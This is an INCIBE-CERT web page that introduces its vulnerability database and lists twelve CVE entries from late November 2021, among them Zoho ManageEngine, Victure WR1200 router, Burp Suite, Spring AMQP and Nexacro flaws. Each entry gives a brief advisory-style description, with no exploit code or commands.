Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Go to Calendar     Go to Press Room     Go to Newsletters subscription

Search

Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2021-4026
Publication date:
30/11/2021
bookstack is vulnerable to Improper Access Control
Severity CVSS v4.0: Pending analysis
Last modification:
09/08/2022

CVE-2021-43319
Publication date:
30/11/2021
Zoho ManageEngine Network Configuration Manager before 125488 is vulnerable to command injection due to improper validation in the Ping functionality.
Severity CVSS v4.0: Pending analysis
Last modification:
06/04/2022

CVE-2021-43295
Publication date:
30/11/2021
Zoho ManageEngine SupportCenter Plus before 11016 is vulnerable to Reflected XSS in the Accounts module.
Severity CVSS v4.0: Pending analysis
Last modification:
27/04/2022

CVE-2021-43296
Publication date:
30/11/2021
Zoho ManageEngine SupportCenter Plus before 11016 is vulnerable to an SSRF attack in ActionExecutor.
Severity CVSS v4.0: Pending analysis
Last modification:
27/04/2022

CVE-2021-44230
Publication date:
30/11/2021
PortSwigger Burp Suite Enterprise Edition before 2021.11 on Windows has weak file permissions for the embedded H2 database, which might lead to privilege escalation. This issue can be exploited by an adversary who has already compromised a valid Windows account on the server via separate means. In this scenario, the compromised account may have inherited read access to sensitive configuration, database, and log files.
Severity CVSS v4.0: Pending analysis
Last modification:
01/12/2021

CVE-2021-43294
Publication date:
30/11/2021
Zoho ManageEngine SupportCenter Plus before 11016 is vulnerable to Reflected XSS in the Products module.
Severity CVSS v4.0: Pending analysis
Last modification:
27/04/2022

CVE-2021-42099
Publication date:
30/11/2021
Zoho ManageEngine M365 Manager Plus before 4421 is vulnerable to file-upload remote code execution.
Severity CVSS v4.0: Pending analysis
Last modification:
06/12/2021

CVE-2021-43284
Publication date:
30/11/2021
An issue was discovered on Victure WR1200 devices through 1.0.3. The root SSH password never gets updated from its default value of admin. This enables an attacker to gain control of the device through SSH (regardless of whether the admin password was changed on the web interface).
Severity CVSS v4.0: Pending analysis
Last modification:
03/12/2021

CVE-2021-43283
Publication date:
30/11/2021
An issue was discovered on Victure WR1200 devices through 1.0.3. A command injection vulnerability was found within the web interface of the device, allowing an attacker with valid credentials to inject arbitrary shell commands to be executed by the device with root privileges. This occurs in the ping and traceroute features. An attacker would thus be able to use this vulnerability to open a reverse shell on the device with root privileges.
Severity CVSS v4.0: Pending analysis
Last modification:
03/12/2021

CVE-2021-43282
Publication date:
30/11/2021
An issue was discovered on Victure WR1200 devices through 1.0.3. The default Wi-Fi WPA2 key is advertised to anyone within Wi-Fi range through the router's MAC address. The device default Wi-Fi password corresponds to the last 4 bytes of the MAC address of its 2.4 GHz network interface controller (NIC). An attacker within scanning range of the Wi-Fi network can thus scan for Wi-Fi networks to obtain the default key.
Severity CVSS v4.0: Pending analysis
Last modification:
03/12/2021

CVE-2021-22095
Publication date:
30/11/2021
In Spring AMQP versions 2.2.0 - 2.2.19 and 2.3.0 - 2.3.11, the Spring AMQP Message object, in its toString() method, will create a new String object from the message body, regardless of its size. This can cause an OOM Error with a large message
Severity CVSS v4.0: Pending analysis
Last modification:
01/12/2021

CVE-2021-26612
Publication date:
30/11/2021
An improper input validation leading to arbitrary file creation was discovered in copy method of Nexacro platform. Remote attackers use copy method to execute arbitrary command after the file creation included malicious code.
Severity CVSS v4.0: Pending analysis
Last modification:
01/12/2021
Subscribe to Vulnerabilities